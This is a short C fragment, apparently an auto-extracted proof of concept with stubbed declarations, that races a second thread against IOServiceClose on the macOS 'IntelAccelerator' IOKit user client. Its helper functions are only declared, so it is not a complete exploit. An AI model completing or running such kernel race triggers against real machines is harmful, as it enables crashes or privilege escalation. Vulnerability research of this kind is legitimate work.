
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pthread_t ;
typedef int mach_port_t ;


 int IOServiceClose (int ) ;
 int OSSpinLockLock (int *) ;
 int OSSpinLockUnlock (int *) ;
 int get_user_client (char*,int) ;
 int lock ;
 int pthread_create (int *,int *,int ,int *) ;
 int pthread_join (int ,int *) ;
 int set_params (int ) ;
 int thread_func ;

void poc(){
  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, ((void*)0), thread_func, ((void*)0));


  mach_port_t conn = get_user_client("IntelAccelerator", 6);

  set_params(conn);
  OSSpinLockUnlock(&lock);
  IOServiceClose(conn);
  pthread_join(t, ((void*)0));
}
